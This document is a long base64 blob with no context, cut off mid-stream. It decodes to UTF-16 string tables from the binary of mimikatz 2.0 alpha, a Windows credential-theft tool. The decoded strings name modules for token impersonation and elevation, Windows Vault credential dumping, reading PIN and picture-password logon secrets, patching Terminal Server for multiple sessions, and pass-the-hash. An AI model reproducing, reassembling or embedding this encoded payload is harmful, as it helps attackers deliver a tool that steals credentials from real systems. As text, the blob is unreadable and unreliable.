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ASQBtAHAAZQByAHMAbwBuAGEAdABlACAAYQAgAHQAbwBrAGUAbgAAAGUAbABlAHYAYQB0AGUAAABMAGkAcwB0ACAAYQBsAGwAIAB0AG8AawBlAG4AcwAgAG8AZgAgAHQAaABlACAAcwB5AHMAdABlAG0AAAAAAAAARABpAHMAcABsAGEAeQAgAGMAdQByAHIAZQBuAHQAIABpAGQAZQBuAHQAaQB0AHkAAAAAAAAAAAB3AGgAbwBhAG0AaQAAAAAAVABvAGsAZQBuACAAbQBhAG4AaQBwAHUAbABhAHQAaQBvAG4AIABtAG8AZAB1AGwAZQAAAAAAAAB0AG8AawBlAG4AAAAAAAAAIAAqACAAUAByAG8AYwBlAHMAcwAgAFQAbwBrAGUAbgAgADoAIAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB0AG8AawBlAG4AXwB3AGgAbwBhAG0AaQAgADsAIABPAHAAZQBuAFAAcgBvAGMAZQBzAHMAVABvAGsAZQBuACAAKAAwAHgAJQAwADgAeAApAAoAAAAAACAAKgAgAFQAaAByAGUAYQBkACAAVABvAGsAZQBuACAAIAA6ACAAAABuAG8AIAB0AG8AawBlAG4ACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHQAbwBrAGUAbgBfAHcAaABvAGEAbQBpACAAOwAgAE8AcABlAG4AVABoAHIAZQBhAGQAVABvAGsAZQBuACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAZABvAG0AYQBpAG4AYQBkAG0AaQBuAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHQAbwBrAGUAbgBfAGwAaQBzAHQAXwBvAHIAXwBlAGwAZQB2AGEAdABlACAAOwAgAGsAdQBsAGwAXwBtAF8AbABvAGMAYQBsAF8AZABvAG0AYQBpAG4AXwB1AHMAZQByAF8AZwBlAHQAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgBTAEkARAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAcwB5AHMAdABlAG0AAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB0AG8AawBlAG4AXwBsAGkAcwB0AF8AbwByAF8AZQBsAGUAdgBhAHQAZQAgADsAIABOAG8AIAB1AHMAZQByAG4AYQBtAGUAIABhAHYAYQBpAGwAYQBiAGwAZQAgAHcAaABlAG4AIABTAFkAUwBUAEUATQAKAAAAVABvAGsAZQBuACAASQBkACAAIAA6ACAAJQB1AAoAVQBzAGUAcgAgAG4AYQBtAGUAIAA6ACAAJQBzAAoAUwBJAEQAIABuAGEAbQBlACAAIAA6ACAAAAAAACUAcwBcACUAcwAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AbABpAHMAdABfAG8AcgBfAGUAbABlAHYAYQB0AGUAIAA7ACAAawB1AGwAbABfAG0AXwB0AG8AawBlAG4AXwBnAGUAdABOAGEAbQBlAEQAbwBtAGEAaQBuAEYAcgBvAG0AUwBJAEQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB0AG8AawBlAG4AXwBsAGkAcwB0AF8AbwByAF8AZQBsAGUAdgBhAHQAZQAgADsAIABrAHUAbABsAF8AbQBfAGwAbwBjAGEAbABfAGQAbwBtAGEAaQBuAF8AdQBzAGUAcgBfAEMAcgBlAGEAdABlAFcAZQBsAGwASwBuAG8AdwBuAFMAaQBkACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB0AG8AawBlAG4AXwByAGUAdgBlAHIAdAAgADsAIABTAGUAdABUAGgAcgBlAGEAZABUAG8AawBlAG4AIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAACUALQAxADAAdQAJAAAAAAAlAHMAXAAlAHMACQAlAHMAAAAAAAAAAAAJACgAJQAwADIAdQBnACwAJQAwADIAdQBwACkACQAlAHMAAAAAAAAAIAAoACUAcwApAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AbABpAHMAdABfAG8AcgBfAGUAbABlAHYAYQB0AGUAXwBjAGEAbABsAGIAYQBjAGsAIAA7ACAAQwBoAGUAYwBrAFQAbwBrAGUAbgBNAGUAbQBiAGUAcgBzAGgAaQBwACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAlAHUACQAAACAALQA+ACAASQBtAHAAZQByAHMAbwBuAGEAdABlAGQAIAAhAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHQAbwBrAGUAbgBfAGwAaQBzAHQAXwBvAHIAXwBlAGwAZQB2AGEAdABlAF8AYwBhAGwAbABiAGEAYwBrACAAOwAgAFMAZQB0AFQAaAByAGUAYQBkAFQAbwBrAGUAbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABbAGUAeABwAGUAcgBpAG0AZQBuAHQAYQBsAF0AIABwAGEAdABjAGgAIABUAGUAcgBtAGkAbgBhAGwAIABTAGUAcgB2AGUAcgAgAHMAZQByAHYAaQBjAGUAIAB0AG8AIABhAGwAbABvAHcAIABtAHUAbAB0AGkAcABsAGUAcwAgAHUAcwBlAHIAcwAAAAAAAABtAHUAbAB0AGkAcgBkAHAAAAAAAAAAAABUAGUAcgBtAGkAbgBhAGwAIABTAGUAcgB2AGUAcgAgAG0AbwBkAHUAbABlAAAAAAB0AHMAAAAAAHQAZQByAG0AcwByAHYALgBkAGwAbAAAAFQAZQByAG0AUwBlAHIAdgBpAGMAZQAAAGQAbwBtAGEAaQBuAF8AZQB4AHQAZQBuAGQAZQBkAAAAZwBlAG4AZQByAGkAYwBfAGMAZQByAHQAaQBmAGkAYwBhAHQAZQAAAGQAbwBtAGEAaQBuAF8AdgBpAHMAaQBiAGwAZQBfAHAAYQBzAHMAdwBvAHIAZAAAAGQAbwBtAGEAaQBuAF8AYwBlAHIAdABpAGYAaQBjAGEAdABlAAAAAABkAG8AbQBhAGkAbgBfAHAAYQBzAHMAdwBvAHIAZAAAAGcAZQBuAGUAcgBpAGMAAABCAGkAbwBtAGUAdAByAGkAYwAAAAAAAABQAGkAYwB0AHUAcgBlACAAUABhAHMAcwB3AG8AcgBkAAAAAAAAAAAAUABpAG4AIABMAG8AZwBvAG4AAAAAAAAARABvAG0AYQBpAG4AIABFAHgAdABlAG4AZABlAGQAAABEAG8AbQBhAGkAbgAgAEMAZQByAHQAaQBmAGkAYwBhAHQAZQAAAAAARABvAG0AYQBpAG4AIABQAGEAcwBzAHcAbwByAGQAAABjAHIAZQBkAAAAAAAAAAAAVwBpAG4AZABvAHcAcwAgAFYAYQB1AGwAdAAvAEMAcgBlAGQAZQBuAHQAaQBhAGwAIABtAG8AZAB1AGwAZQAAAHYAYQB1AGwAdAAAAAAAAAB2AGEAdQBsAHQAYwBsAGkAAAAAAAAAAABWYXVsdEVudW1lcmF0ZUl0ZW1UeXBlcwBWYXVsdEVudW1lcmF0ZVZhdWx0cwAAAABWYXVsdE9wZW5WYXVsdAAAVmF1bHRHZXRJbmZvcm1hdGlvbgAAAAAAVmF1bHRFbnVtZXJhdGVJdGVtcwAAAAAAVmF1bHRDbG9zZVZhdWx0AFZhdWx0RnJlZQAAAAAAAABWYXVsdEdldEl0ZW0AAAAACgBWAGEAdQBsAHQAIAA6ACAAAAAAAAAACQBJAHQAZQBtAHMAIAAoACUAdQApAAoAAAAAAAAAAAAJACAAJQAyAHUALgAJACUAcwAKAAAAAAAJAAkAVAB5AHAAZQAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAAAAAAAAAAAAJAAkATABhAHMAdABXAHIAaQB0AHQAZQBuACAAIAAgACAAIAA6ACAAAAAAAAAAAAAJAAkARgBsAGEAZwBzACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAKAAAAAAAAAAkACQBSAGUAcwBzAG8AdQByAGMAZQAgACAAIAAgACAAIAAgADoAIAAAAAAAAAAAAAkACQBJAGQAZQBuAHQAaQB0AHkAIAAgACAAIAAgACAAIAAgADoAIAAAAAAAAAAAAAkACQBBAHUAdABoAGUAbgB0AGkAYwBhAHQAbwByACAAIAAgADoAIAAAAAAAAAAAAAkACQBQAHIAbwBwAGUAcgB0AHkAIAAlADIAdQAgACAAIAAgACAAOgAgAAAAAAAAAAkACQAqAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABvAHIAKgAgADoAIAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AbABpAHMAdAAgADsAIABWAGEAdQBsAHQARwBlAHQASQB0AGUAbQA3ACAAOgAgACUAMAA4AHgAAAAAAAkACQBQAGEAYwBrAGEAZwBlAFMAaQBkACAAIAAgACAAIAAgADoAIAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AbABpAHMAdAAgADsAIABWAGEAdQBsAHQARwBlAHQASQB0AGUAbQA4ACAAOgAgACUAMAA4AHgAAAAAAAoACQAJACoAKgAqACAAJQBzACAAKgAqACoACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB2AGEAdQBsAHQAXwBsAGkAcwB0ACAAOwAgAFYAYQB1AGwAdABFAG4AdQBtAGUAcgBhAHQAZQBWAGEAdQBsAHQAcwAgADoAIAAwAHgAJQAwADgAeAAKAAAAAAAAAAAACQAJAFUAcwBlAHIAIAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgAAAAAAAAAAAAJQBzAFwAJQBzAAAAAAAAAAAAAAAAAAAAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFwATABvAGcAbwBuAFUASQBcAFAAaQBjAHQAdQByAGUAUABhAHMAcwB3AG8AcgBkAAAAAAAAAAAAYgBnAFAAYQB0AGgAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB2AGEAdQBsAHQAXwBsAGkAcwB0AF8AZABlAHMAYwBJAHQAZQBtAF8AUABJAE4ATABvAGcAbwBuAE8AcgBQAGkAYwB0AHUAcgBlAFAAYQBzAHMAdwBvAHIAZABPAHIAQgBpAG8AbQBlAHQAcgBpAGMAIAA7ACAAUgBlAGcAUQB1AGUAcgB5AFYAYQBsAHUAZQBFAHgAIAAyACAAOgAgACUAMAA4AHgACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AbABpAHMAdABfAGQAZQBzAGMASQB0AGUAbQBfAFAASQBOAEwAbwBnAG8AbgBPAHIAUABpAGMAdAB1AHIAZQBQAGEAcwBzAHcAbwByAGQATwByAEIAaQBvAG0AZQB0AHIAaQBjACAAOwAgAFIAZQBnAFEAdQBlAHIAeQBWAGEAbAB1AGUARQB4ACAAMQAgADoAIAAlADAAOAB4AAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGwAaQBzAHQAXwBkAGUAcwBjAEkAdABlAG0AXwBQAEkATgBMAG8AZwBvAG4ATwByAFAAaQBjAHQAdQByAGUAUABhAHMAcwB3AG8AcgBkAE8AcgBCAGkAbwBtAGUAdAByAGkAYwAgADsAIABSAGUAZwBPAHAAZQBuAEsAZQB5AEUAeAAgAFMASQBEACAAOgAgACUAMAA4AHgACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB2AGEAdQBsAHQAXwBsAGkAcwB0AF8AZABlAHMAYwBJAHQAZQBtAF8AUABJAE4ATABvAGcAbwBuAE8AcgBQAGkAYwB0AHUAcgBlAFAAYQBzAHMAdwBvAHIAZABPAHIAQgBpAG8AbQBlAHQAcgBpAGMAIAA7ACAAQwBvAG4AdgBlAHIAdABTAGkAZABUAG8AUwB0AHIAaQBuAGcAUwBpAGQAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AbABpAHMAdABfAGQAZQBzAGMASQB0AGUAbQBfAFAASQBOAEwAbwBnAG8AbgBPAHIAUABpAGMAdAB1AHIAZQBQAGEAcwBzAHcAbwByAGQATwByAEIAaQBvAG0AZQB0AHIAaQBjACAAOwAgAFIAZQBnAE8AcABlAG4ASwBlAHkARQB4ACAAUABpAGMAdAB1AHIAZQBQAGEAcwBzAHcAbwByAGQAIAA6ACAAJQAwADgAeAAKAAAAAAAAAAAACQAJAFAAYQBzAHMAdwBvAHIAZAAgACAAIAAgACAAIAAgACAAOgAgAAAAAAAAAAAACQAJAFAASQBOACAAQwBvAGQAZQAgACAAIAAgACAAIAAgACAAOgAgACUAMAA0AGgAdQAKAAAAAAAJAAkAQgBhAGMAawBnAHIAbwB1AG4AZAAgAHAAYQB0AGgAIAA6ACAAJQBzAAoAAAAAAAAAAAAAAAkACQBQAGkAYwB0AHUAcgBlACAAcABhAHMAcwB3AG8AcgBkACAAKABnAHIAaQBkACAAaQBzACAAMQA1ADAAKgAxADAAMAApAAoAAAAAAAAACQAJACAAWwAlAHUAXQAgAAAAAAAAAAAAcABvAGkAbgB0ACAAIAAoAHgAIAA9ACAAJQAzAHUAIAA7ACAAeQAgAD0AIAAlADMAdQApAAAAAABjAGwAbwBjAGsAdwBpAHMAZQAAAAAAAABhAG4AdABpAGMAbABvAGMAawB3AGkAcwBlAAAAAAAAAAAAAAAAAAAAYwBpAHIAYwBsAGUAIAAoAHgAIAA9ACAAJQAzAHUAIAA7ACAAeQAgAD0AIAAlADMAdQAgADsAIAByACAAPQAgACUAMwB1ACkAIAAtACAAJQBzAAAAAAAAAAAAAAAAAAAAbABpAG4AZQAgACAAIAAoAHgAIAA9ACAAJQAzAHUAIAA7ACAAeQAgAD0AIAAlADMAdQApACAALQA+ACAAKAB4ACAAPQAgACUAMwB1ACAAOwAgAHkAIAA9ACAAJQAzAHUAKQAAAAAAAAAlAHUACgAAAAkACQBQAHIAbwBwAGUAcgB0AHkAIAAgACAAIAAgACAAIAAgADoAIAAAAAAAAAAAACUALgAqAHMAXAAAAAAAAAAlAC4AKgBzAAAAAAAAAAAAdABvAGQAbwAgAD8ACgAAAAkATgBhAG0AZQAgACAAIAAgACAAIAAgADoAIAAlAHMACgAAAAAAAAB0AGUAbQBwACAAdgBhAHUAbAB0AAAAAAAJAFAAYQB0AGgAIAAgACAAIAAgACAAIAA6ACAAJQBzAAoAAAAAAAAAJQBoAHUAAAAlAHUAAAAAAFsAVAB5AHAAZQAgACUAdQBdACAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AYwByAGUAZAAgADsAIABrAHUAbABsAF8AbQBfAHAAYQB0AGMAaAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGMAcgBlAGQAIAA7ACAAawB1AGwAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AZwBlAHQAVgBlAHIAeQBCAGEAcwBpAGMATQBvAGQAdQBsAGUASQBuAGYAbwByAG0AYQB0AGkAbwBuAHMARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGMAcgBlAGQAIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGMAcgBlAGQAIAA7ACAAawB1AGwAbABfAG0AXwBzAGUAcgB2AGkAYwBlAF8AZwBlAHQAVQBuAGkAcQB1AGUARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAPwAgACgAdAB5AHAAZQAgAD4AIABDAFIARQBEAF8AVABZAFAARQBfAE0AQQBYAEkATQBVAE0AKQAAAAAAAAAAADwATgBVAEwATAA+AAAAAAAAAAAAAAAAAFQAYQByAGcAZQB0AE4AYQBtAGUAIAA6ACAAJQBzACAALwAgACUAcwAKAFUAcwBlAHIATgBhAG0AZQAgACAAIAA6ACAAJQBzAAoAQwBvAG0AbQBlAG4AdAAgACAAIAAgADoAIAAlAHMACgBUAHkAcABlACAAIAAgACAAIAAgACAAOgAgACUAdQAgAC0AIAAlAHMACgBDAHIAZQBkAGUAbgB0AGkAYQBsACAAOgAgAAAACgAKAAAAAABpAG4AZgBvAHMAAAAAAAAATQBpAG4AZQBTAHcAZQBlAHAAZQByACAAbQBvAGQAdQBsAGUAAAAAAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgAAAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgAuAGUAeABlAAAAAAAAAAAAAABGAGkAZQBsAGQAIAA6ACAAJQB1ACAAcgAgAHgAIAAlAHUAIABjAAoATQBpAG4AZQBzACAAOgAgACUAdQAKAAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAE0AZQBtAG8AcgB5ACAAQwAgACgAUgAgAD0AIAAlAHUAKQAKAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwAgADsAIABNAGUAbQBvAHIAeQAgAFIACgAAAAAACQAAAAAAAAAlAEMAIAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAAQgBvAGEAcgBkACAAYwBvAHAAeQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAARwBhAG0AZQAgAGMAbwBwAHkACgAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAARwAgAGMAbwBwAHkACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAARwBsAG8AYgBhAGwAIABjAG8AcAB5AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAAUwBlAGEAcgBjAGgAIABpAHMAIABLAE8ACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAATQBpAG4AZQBzAHcAZQBlAHAAZQByACAATgBUACAASABlAGEAZABlAHIAcwAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwAgADsAIABNAGkAbgBlAHMAdwBlAGUAcABlAHIAIABQAEUAQgAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAE4AbwAgAE0AaQBuAGUAUwB3AGUAZQBwAGUAcgAgAGkAbgAgAG0AZQBtAG8AcgB5ACEACgAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAXwBwAGEAcgBzAGUARgBpAGUAbABkACAAOwAgA